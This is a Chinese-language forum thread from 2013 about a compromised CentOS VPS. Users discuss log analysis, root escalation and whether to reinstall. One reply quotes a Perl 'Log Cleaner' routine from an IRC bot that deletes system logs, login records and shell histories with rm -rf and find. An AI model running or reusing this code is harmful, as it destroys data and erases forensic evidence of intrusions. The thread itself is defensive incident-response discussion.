centos VPS被入侵，我该怎么处理？

milujite

chenyx 发表于 2013-05-29 17:14
对,apache就看apache的日志.
你要是apache+php的话,exec函数要是没有用,可以在php.ini里面禁用.网上有相关 ...

1. ######################
   
2. #    Log Cleaner     #  
   
3. ######################
   
4. if ($funcarg =~ /^logcleaner/) {
   
5. sendraw($IRC_cur_socket, "PRIVMSG $printl :3.:!:.9Log Cleaner!!!3.:!:. it takes a couple of minutes...");
   
6.     system 'rm -rf /var/log/lastlog';
   
7.     system 'rm -rf /var/log/wtmp';
   
8.         system 'rm -rf /etc/wtmp';
   
9.         system 'rm -rf /var/run/utmp';
   
10.         system 'rm -rf /etc/utmp';
    
11.         system 'rm -rf /var/log';
    
12.         system 'rm -rf /var/logs';
    
13.         system 'rm -rf /var/adm';
    
14.         system 'rm -rf /var/apache/log';
    
15.         system 'rm -rf /var/apache/logs';
    
16.         system 'rm -rf /usr/local/apache/log';
    
17.         system 'rm -rf /usr/local/apache/logs';
    
18.         system 'rm -rf /root/.bash_history';
    
19.         system 'rm -rf /root/.ksh_history';
    
20. sendraw($IRC_cur_socket, "PRIVMSG $printl :3.:!:.9Log Cleaner3.:!:. 3log files have been cleaned");
    
21.                 sleep 1;
    
22. sendraw($IRC_cur_socket, "PRIVMSG $printl :3.:!:.9Log Cleaner3.:!:. 3system log cleaner");
    
23.         system 'find / -name *.bash_history -exec rm -rf {} \;';
    
24.         system 'find / -name *.bash_logout -exec rm -rf {} \;';
    
25.         system 'find / -name "log*" -exec rm -rf {} \;';
    
26.         system 'find / -name *.log -exec rm -rf {} \;';
    
27.                 sleep 1;
    
28. sendraw($IRC_cur_socket, "PRIVMSG $printl :3.:!:.9Log Cleaner3.:!:. 3done! all log files have been cleaned");
    
29.       }
    
30. ######################
    
31. # End of Log Cleaner #  
    
32. ######################

复制代码

这个log应该没什么价值了。上面脚本直接调用系统命令清掉了日志。

chenyx

不会吧,apache用户有权限清除系统日志吗,表示怀疑. @milujite

milujite

chenyx 发表于 2013-05-29 17:25
不会吧,apache用户有权限清除系统日志吗,表示怀疑. @milujite

可以缓冲区溢出之类的吧。apache漏洞也不少呢

chenyx

milujite 发表于 2013-05-29 17:31
可以缓冲区溢出之类的吧。apache漏洞也不少呢

这个就不清楚了,只能让楼主确认下日志还健在不了

lbseraph

centos64 发表于 2013-05-29 17:09
回复 2# lbseraph

感谢回复兄弟，这个文件我尝试很多次都无法打开不知道怎么回事。

附上这个网页的完整内容供你参考~
bot.zip (6.69 KB, 下载次数: 4)

2013-05-29 22:15 上传

点击文件名下载附件
bot.log

pix77

他已经提权到了root权限了，删除日志是小事情了

chenyx

真要是获取到root权限了,什么防火都是浮云,只能重装了.

lbseraph

找到有root权限的用户删掉不就行了？不用重装吧？还有限制IP段访问，这样对方就没法连进来了吧？

chenyx

限制应该不可行吧,你放到公网上,不就是为了大家访问的嘛. @lbseraph
现在不清楚楼主是否还能找到log,有log才能有的放矢.

fire_cpp

遇到入侵，如果不是很在行的，建议重装。因为你不知道对方放了什么后门。当然重装前把日志拷出来，好好分析下。